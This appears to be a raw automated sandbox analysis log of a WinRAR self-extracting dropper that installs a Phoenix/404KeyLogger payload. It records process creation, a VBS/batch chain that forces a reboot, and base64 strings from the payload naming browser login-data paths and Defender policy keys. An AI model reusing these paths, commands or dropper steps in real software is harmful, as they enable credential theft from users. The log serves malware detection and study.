              Source: C:\Users\Public\Downloads\systems.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: C:\Users\Public\Downloads\systems.exe, type: DROPPEDMatched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: String function: 00A1E554 appears 35 times
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: String function: 00A1E630 appears 54 times
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: String function: 00A1EFB0 appears 31 times
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: 1_2_00A071E6: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,1_2_00A071E6
              Source: 2cB42TzofC.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\2cB42TzofC.exeFile created: C:\Users\Public\Downloads\__tmp_rar_sfx_access_check_6659500Jump to behavior
              Source: classification engineClassification label: mal66.rans.troj.spyw.evad.winEXE@46/4@26/4
              Source: C:\Users\user\Desktop\2cB42TzofC.exeFile read: C:\Windows\win.iniJump to behavior
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: 1_2_00A06EA8 GetLastError,FormatMessageW,1_2_00A06EA8
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: 1_2_00A1A07C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,1_2_00A1A07C
              Source: C:\Users\user\Desktop\2cB42TzofC.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Downloads\vbs.vbs"
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Downloads\vbs.bat" "
              Source: 2cB42TzofC.exeReversingLabs: Detection: 82%
              Source: C:\Users\user\Desktop\2cB42TzofC.exeFile read: C:\Users\user\Desktop\2cB42TzofC.exeJump to behavior
              Source: C:\Users\user\Desktop\2cB42TzofC.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\2cB42TzofC.exe "C:\Users\user\Desktop\2cB42TzofC.exe"
              Source: C:\Users\user\Desktop\2cB42TzofC.exeProcess created: C:\Users\Public\Downloads\systems.exe "C:\Users\Public\Downloads\systems.exe"
              Source: C:\Users\user\Desktop\2cB42TzofC.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Downloads\vbs.vbs"
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Downloads\vbs.bat" "
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 50
              Source: C:\Users\Public\Downloads\systems.exeProcess created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\System32\explorer.exe" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
              Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
              Source: C:\Users\Public\Downloads\systems.exeProcess created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\System32\explorer.exe" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
              Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
              Source: C:\Users\Public\Downloads\systems.exeProcess created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\System32\explorer.exe" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
              Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
              Source: C:\Users\Public\Downloads\systems.exeProcess created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\System32\explorer.exe" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
              Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
              Source: C:\Users\Public\Downloads\systems.exeProcess created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\System32\explorer.exe" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
              Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
              Source: C:\Users\Public\Downloads\systems.exeProcess created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\System32\explorer.exe" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
              Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
              Source: C:\Users\Public\Downloads\systems.exeProcess created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\System32\explorer.exe" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
              Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
              Source: C:\Users\Public\Downloads\systems.exeProcess created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\System32\explorer.exe" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
              Source: C:\Users\user\Desktop\2cB42TzofC.exeProcess created: C:\Users\Public\Downloads\systems.exe "C:\Users\Public\Downloads\systems.exe" Jump to behavior
              Source: C:\Users\user\Desktop\2cB42TzofC.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Downloads\vbs.vbs" Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\System32\explorer.exe" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartupJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\System32\explorer.exe" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartupJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\System32\explorer.exe" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartupJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Downloads\vbs.bat" "Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\System32\explorer.exe" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartupJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\System32\explorer.exe" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartupJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\System32\explorer.exe" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartupJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\System32\explorer.exe" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartupJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Downloads\vbs.bat" "Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 50Jump to behavior
              Source: C:\Users\user\Desktop\2cB42TzofC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
              Source: C:\Users\Public\Downloads\systems.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\Public\Downloads\systems.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeCode function: 7_2_00B80628 CreateToolhelp32Snapshot,GetCurrentConsoleFont,7_2_00B80628
              Source: systems.exe.1.dr, ??WB?????PO?UWG?O.csBase64 encoded string: 'XFRlbmNlbnRcUVFCcm93c2VyXFVzZXIgRGF0YVxEZWZhdWx0XEVuY3J5cHRlZFN0b3JhZ2U=', 'XENvY0NvY1xCcm93c2VyXFVzZXIgRGF0YVxEZWZhdWx0XExvZ2luIERhdGE=', 'XEFWQVNUIFNvZnR3YXJlXEJyb3dzZXJcVXNlciBEYXRhXERlZmF1bHRcTG9naW4gRGF0YQ==', 'XE9yYml0dW1cVXNlciBEYXRhXERlZmF1bHRcTG9naW4gRGF0YQ==', 'XENvbW9kb1xEcmFnb25cVXNlciBEYXRhXERlZmF1bHRcTG9naW4gRGF0YQ==', 'XEVwaWMgUHJpdmFjeSBCcm93c2VyXFVzZXIgRGF0YVxEZWZhdWx0XExvZ2luIERhdGE=', 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb24='
              Source: systems.exe.1.dr, ???F?Z?U???X?G?G?Q.csBase64 encoded string: 'Ky0tLS0tLS0tLS0tLS0gQ2xpZW50IElORk8gLS0tLS0tLS0tLS0tLSsNCklQOiA=', 'TWF5YmUgQnJvd3NlciBpc24ndCBpbnN0YWxsZWQsIHJlYWwgZGV0YWlsczog', 'SEtFWV9MT0NBTF9NQUNISU5FXFNPRlRXQVJFXFBvbGljaWVzXE1pY3Jvc29mdFxXaW5kb3dzIERlZmVuZGVy'
              Source: systems.exe.1.dr, ?E??V???SOG?HGWQ.csBase64 encoded string: 'U09GVFdBUkVcQ2xhc3Nlc1xGb3htYWlsLnVybC5tYWlsdG9cU2hlbGxcb3Blblxjb21tYW5k'
              Source: 7.2.systems.exe.220000.0.unpack, ??WB?????PO?UWG?O.csBase64 encoded string: 'XFRlbmNlbnRcUVFCcm93c2VyXFVzZXIgRGF0YVxEZWZhdWx0XEVuY3J5cHRlZFN0b3JhZ2U=', 'XENvY0NvY1xCcm93c2VyXFVzZXIgRGF0YVxEZWZhdWx0XExvZ2luIERhdGE=', 'XEFWQVNUIFNvZnR3YXJlXEJyb3dzZXJcVXNlciBEYXRhXERlZmF1bHRcTG9naW4gRGF0YQ==', 'XE9yYml0dW1cVXNlciBEYXRhXERlZmF1bHRcTG9naW4gRGF0YQ==', 'XENvbW9kb1xEcmFnb25cVXNlciBEYXRhXERlZmF1bHRcTG9naW4gRGF0YQ==', 'XEVwaWMgUHJpdmFjeSBCcm93c2VyXFVzZXIgRGF0YVxEZWZhdWx0XExvZ2luIERhdGE=', 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb24='
              Source: 7.2.systems.exe.220000.0.unpack, ???F?Z?U???X?G?G?Q.csBase64 encoded string: 'Ky0tLS0tLS0tLS0tLS0gQ2xpZW50IElORk8gLS0tLS0tLS0tLS0tLSsNCklQOiA=', 'TWF5YmUgQnJvd3NlciBpc24ndCBpbnN0YWxsZWQsIHJlYWwgZGV0YWlsczog', 'SEtFWV9MT0NBTF9NQUNISU5FXFNPRlRXQVJFXFBvbGljaWVzXE1pY3Jvc29mdFxXaW5kb3dzIERlZmVuZGVy'
              Source: 7.2.systems.exe.220000.0.unpack, ?E??V???SOG?HGWQ.csBase64 encoded string: 'U09GVFdBUkVcQ2xhc3Nlc1xGb3htYWlsLnVybC5tYWlsdG9cU2hlbGxcb3Blblxjb21tYW5k'
              Source: 7.0.systems.exe.220000.0.unpack, ??WB?????PO?UWG?O.csBase64 encoded string: 'XFRlbmNlbnRcUVFCcm93c2VyXFVzZXIgRGF0YVxEZWZhdWx0XEVuY3J5cHRlZFN0b3JhZ2U=', 'XENvY0NvY1xCcm93c2VyXFVzZXIgRGF0YVxEZWZhdWx0XExvZ2luIERhdGE=', 'XEFWQVNUIFNvZnR3YXJlXEJyb3dzZXJcVXNlciBEYXRhXERlZmF1bHRcTG9naW4gRGF0YQ==', 'XE9yYml0dW1cVXNlciBEYXRhXERlZmF1bHRcTG9naW4gRGF0YQ==', 'XENvbW9kb1xEcmFnb25cVXNlciBEYXRhXERlZmF1bHRcTG9naW4gRGF0YQ==', 'XEVwaWMgUHJpdmFjeSBCcm93c2VyXFVzZXIgRGF0YVxEZWZhdWx0XExvZ2luIERhdGE=', 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb24='
              Source: 7.0.systems.exe.220000.0.unpack, ???F?Z?U???X?G?G?Q.csBase64 encoded string: 'Ky0tLS0tLS0tLS0tLS0gQ2xpZW50IElORk8gLS0tLS0tLS0tLS0tLSsNCklQOiA=', 'TWF5YmUgQnJvd3NlciBpc24ndCBpbnN0YWxsZWQsIHJlYWwgZGV0YWlsczog', 'SEtFWV9MT0NBTF9NQUNISU5FXFNPRlRXQVJFXFBvbGljaWVzXE1pY3Jvc29mdFxXaW5kb3dzIERlZmVuZGVy'
              Source: 7.0.systems.exe.220000.0.unpack, ?E??V???SOG?HGWQ.csBase64 encoded string: 'U09GVFdBUkVcQ2xhc3Nlc1xGb3htYWlsLnVybC5tYWlsdG9cU2hlbGxcb3Blblxjb21tYW5k'
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7072:120:WilError_01
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCommand line argument: sfxname1_2_00A1D891
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCommand line argument: sfxstime1_2_00A1D891
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCommand line argument: STARTDLG1_2_00A1D891
              Source: C:\Users\Public\Downloads\systems.exeProcess created: C:\Windows\SysWOW64\explorer.exe
              Source: unknownProcess created: C:\Windows\explorer.exe
              Source: C:\Users\Public\Downloads\systems.exeProcess created: C:\Windows\SysWOW64\explorer.exe
              Source: unknownProcess created: C:\Windows\explorer.exe
              Source: C:\Users\Public\Downloads\systems.exeProcess created: C:\Windows\SysWOW64\explorer.exe
              Source: unknownProcess created: C:\Windows\explorer.exe
              Source: C:\Users\Public\Downloads\systems.exeProcess created: C:\Windows\SysWOW64\explorer.exe
              Source: unknownProcess created: C:\Windows\explorer.exe
              Source: C:\Users\Public\Downloads\systems.exeProcess created: C:\Windows\SysWOW64\explorer.exe
              Source: unknownProcess created: C:\Windows\explorer.exe
              Source: C:\Users\Public\Downloads\systems.exeProcess created: C:\Windows\SysWOW64\explorer.exe
              Source: unknownProcess created: C:\Windows\explorer.exe
              Source: C:\Users\Public\Downloads\systems.exeProcess created: C:\Windows\SysWOW64\explorer.exe
              Source: unknownProcess created: C:\Windows\explorer.exe
              Source: C:\Users\Public\Downloads\systems.exeProcess created: C:\Windows\SysWOW64\explorer.exe
              Source: C:\Users\Public\Downloads\systems.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Users\Public\Downloads\systems.exeAutomated click: Continue
              Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
              Source: C:\Windows\explorer.exeFile opened: C:\Windows\SYSTEM32\MsftEdit.dllJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: 2cB42TzofC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: 2cB42TzofC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: 2cB42TzofC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: 2cB42TzofC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: 2cB42TzofC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: 2cB42TzofC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: 2cB42TzofC.exeStatic PE information: GUARD_CF, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
              Source: 2cB42TzofC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 2cB42TzofC.exe
              Source: 2cB42TzofC.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: 2cB42TzofC.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: 2cB42TzofC.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: 2cB42TzofC.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: 2cB42TzofC.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: 1_2_00A1E554 push eax; ret 1_2_00A1E572
              Source: C:\Users\user\Desktop\2cB42TzofC.exeCode function: 1_2_00A1EFF6 push ecx; ret 1_2_00A1F009
              Source: C:\Users\Public\Downloads\systems.exeCode function: 7_2_00B8BE70 push eax; ret 7_2_00B8BE7D
              Source: 2cB42TzofC.exeStatic PE information: section name: .didat
              Source: C:\Users\user\Desktop\2cB42TzofC.exeFile created: C:\Users\Public\Downloads\__tmp_rar_sfx_access_check_6659500Jump to behavior
              Source: C:\Users\user\Desktop\2cB42TzofC.exeFile created: C:\Users\Public\Downloads\systems.exeJump to dropped file
              Source: C:\Windows\explorer.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
              Source: C:\Users\user\Desktop\2cB42TzofC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Downloads\systems.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
